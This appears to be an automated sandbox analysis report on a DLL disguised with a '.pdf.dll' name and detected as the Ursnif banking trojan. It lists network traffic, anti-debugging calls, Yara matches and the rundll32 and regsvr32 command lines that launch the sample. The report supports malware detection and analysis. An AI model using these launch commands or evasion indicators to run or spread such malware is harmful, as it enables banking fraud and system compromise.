Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/mit-ihren-blauen-hinweistafeln-f%c3%bchrt-uns-anne-kustermann-v
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/publibike-m%c3%b6chte-in-der-stadt-z%c3%bcrich-eine-erfolgsgesc
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/weder-alltagstauglich-noch-kindgerecht-neben-firmen-bem%c3%a4ng
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.skype.com/
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.skype.com/de
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.7.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[1].json.7.dr	String found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49739 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.6e160000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.6e160000.1.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.6e160000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.6e160000.1.unpack, type: UNPACKEDPE

System Summary:

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: 606d810b8ff92.pdf.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E162375 NtQueryVirtualMemory,		3_2_6E162375
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E162375 NtQueryVirtualMemory,		6_2_6E162375

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1D8C79	0_2_6E1D8C79
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1CCBC5	0_2_6E1CCBC5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E44A8	0_2_6E1E44A8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E186520	0_2_6E186520
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1CA570	0_2_6E1CA570
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E18856E	0_2_6E18856E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E45C8	0_2_6E1E45C8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1BE5FB	0_2_6E1BE5FB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E0242	0_2_6E1E0242
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1BE396	0_2_6E1BE396
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1BE122	0_2_6E1BE122
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1CA140	0_2_6E1CA140
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1BDEBD	0_2_6E1BDEBD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1AFEC7	0_2_6E1AFEC7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1C9C10	0_2_6E1C9C10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1BDC7C	0_2_6E1BDC7C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1BDA4A	0_2_6E1BDA4A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1C7B77	0_2_6E1C7B77
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1BD809	0_2_6E1BD809
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1AD780	0_2_6E1AD780
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E153C	0_2_6E1E153C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1BD5D7	0_2_6E1BD5D7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1C70C3	0_2_6E1C70C3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1D3187	0_2_6E1D3187
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E162154	3_2_6E162154
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E1AD780	3_2_6E1AD780
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E1C9C10	3_2_6E1C9C10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E1C7B77	3_2_6E1C7B77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E1CCBC5	3_2_6E1CCBC5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E1D3187	3_2_6E1D3187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E162154	6_2_6E162154
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1AD780	6_2_6E1AD780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1C9C10	6_2_6E1C9C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1C7B77	6_2_6E1C7B77
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1CCBC5	6_2_6E1CCBC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1D3187	6_2_6E1D3187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1C9C10	8_2_6E1C9C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1D8C79	8_2_6E1D8C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1BDA4A	8_2_6E1BDA4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1C7B77	8_2_6E1C7B77
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1CCBC5	8_2_6E1CCBC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1AD780	8_2_6E1AD780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1E44A8	8_2_6E1E44A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1E153C	8_2_6E1E153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E186520	8_2_6E186520
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E18856E	8_2_6E18856E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1E45C8	8_2_6E1E45C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1D3187	8_2_6E1D3187

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E1A9DF3 appears 39 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E1AA7D0 appears 64 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E1D422D appears 32 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E1A9DBF appears 248 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6E1A9DBF appears 157 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E1A9DF3 appears 62 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E1C2A4D appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E1AA7D0 appears 74 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E1A9DBF appears 398 times

Source: 606d810b8ff92.pdf.dll

Binary or memory string: OriginalFilenamemetal.dll4 vs 606d810b8ff92.pdf.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: 606d810b8ff92.pdf.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal68.troj.winDLL@23/82@6/3

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF9F36DE493844459A.TMP

Jump to behavior

Source: 606d810b8ff92.pdf.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\606d810b8ff92.pdf.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Charthea1
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2436 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Claimdecide
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,DeathBroad
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Meetfinish
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Mouththese
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\606d810b8ff92.pdf.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Charthea1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Claimdecide	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,DeathBroad	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Meetfinish	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Mouththese	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2436 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 606d810b8ff92.pdf.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 606d810b8ff92.pdf.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 606d810b8ff92.pdf.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 606d810b8ff92.pdf.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 606d810b8ff92.pdf.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 606d810b8ff92.pdf.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 606d810b8ff92.pdf.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 606d810b8ff92.pdf.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: 606d810b8ff92.pdf.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 606d810b8ff92.pdf.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 606d810b8ff92.pdf.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 606d810b8ff92.pdf.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 606d810b8ff92.pdf.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6E161745 LoadLibraryA,GetProcAddress,

3_2_6E161745

Source: 606d810b8ff92.pdf.dll

Static PE information: real checksum: 0xc7eb9 should be: 0xccf2d

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\606d810b8ff92.pdf.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E164A1D push es; ret	0_2_6E164A2C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E164839 pushad ; ret	0_2_6E164852
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E163D7A push ds; retf	0_2_6E163D7C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1A9D88 push ecx; ret	0_2_6E1A9D9B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1656CB push eax; ret	0_2_6E1656D3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E162143 push ecx; ret	3_2_6E162153
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E1620F0 push ecx; ret	3_2_6E1620F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E1A9D88 push ecx; ret	3_2_6E1A9D9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E162143 push ecx; ret	6_2_6E162153
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1620F0 push ecx; ret	6_2_6E1620F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1A9D88 push ecx; ret	6_2_6E1A9D9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1A9D88 push ecx; ret	8_2_6E1A9D9B

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.6e160000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.6e160000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DB953 FindFirstFileExA,FindNextFileA,FindClose,		0_2_6E1DB953
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DB597 FindFirstFileExA,		0_2_6E1DB597

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1E855D IsDebuggerPresent,OutputDebugStringW,

0_2_6E1E855D

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6E161745 LoadLibraryA,GetProcAddress,

3_2_6E161745

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DAE14 mov eax, dword ptr fs:[00000030h]	0_2_6E1DAE14
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DAE57 mov eax, dword ptr fs:[00000030h]	0_2_6E1DAE57
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DAEB2 mov eax, dword ptr fs:[00000030h]	0_2_6E1DAEB2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DAF67 mov eax, dword ptr fs:[00000030h]	0_2_6E1DAF67
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DAFAB mov eax, dword ptr fs:[00000030h]	0_2_6E1DAFAB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DAFEF mov eax, dword ptr fs:[00000030h]	0_2_6E1DAFEF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DADD1 mov eax, dword ptr fs:[00000030h]	0_2_6E1DADD1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1CD988 mov eax, dword ptr fs:[00000030h]	0_2_6E1CD988
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DB020 mov eax, dword ptr fs:[00000030h]	0_2_6E1DB020
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E1DAFEF mov eax, dword ptr fs:[00000030h]	3_2_6E1DAFEF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E1CD988 mov eax, dword ptr fs:[00000030h]	3_2_6E1CD988
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1DAFEF mov eax, dword ptr fs:[00000030h]	6_2_6E1DAFEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1CD988 mov eax, dword ptr fs:[00000030h]	6_2_6E1CD988
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1DAFEF mov eax, dword ptr fs:[00000030h]	8_2_6E1DAFEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1CD988 mov eax, dword ptr fs:[00000030h]	8_2_6E1CD988

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1AA3EC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E1AA3EC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1AA0D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E1AA0D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1C20F2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E1C20F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E1AA0D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6E1AA0D8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6E1C20F2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E1C20F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1AA0D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6E1AA0D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1C20F2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_6E1C20F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1AA3EC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_6E1AA3EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1AA0D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_6E1AA0D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E1C20F2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_6E1C20F2

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1

Jump to behavior

Source: regsvr32.exe, 00000003.00000002.496316032.00000000032C0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.489684029.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.479406528.00000000031A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.492487945.0000000003490000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.512427329.0000000003470000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.513066418.00000000036E0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.477745936.0000000003630000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.482282850.0000000003450000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.496316032.00000000032C0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.489684029.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.479406528.00000000031A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.492487945.0000000003490000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.512427329.0000000003470000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.513066418.00000000036E0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.477745936.0000000003630000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.482282850.0000000003450000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.496316032.00000000032C0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.489684029.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.479406528.00000000031A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.492487945.0000000003490000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.512427329.0000000003470000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.513066418.00000000036E0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.477745936.0000000003630000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.482282850.0000000003450000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000003.00000002.496316032.00000000032C0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.489684029.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.479406528.00000000031A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.492487945.0000000003490000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.512427329.0000000003470000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.513066418.00000000036E0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.477745936.0000000003630000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.482282850.0000000003450000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1AA5E9 cpuid

0_2_6E1AA5E9

Source: C:\Windows\System32\loaddll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_6E1DEECF
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E1D46E7
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E1D3CC2
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E1D3DC2
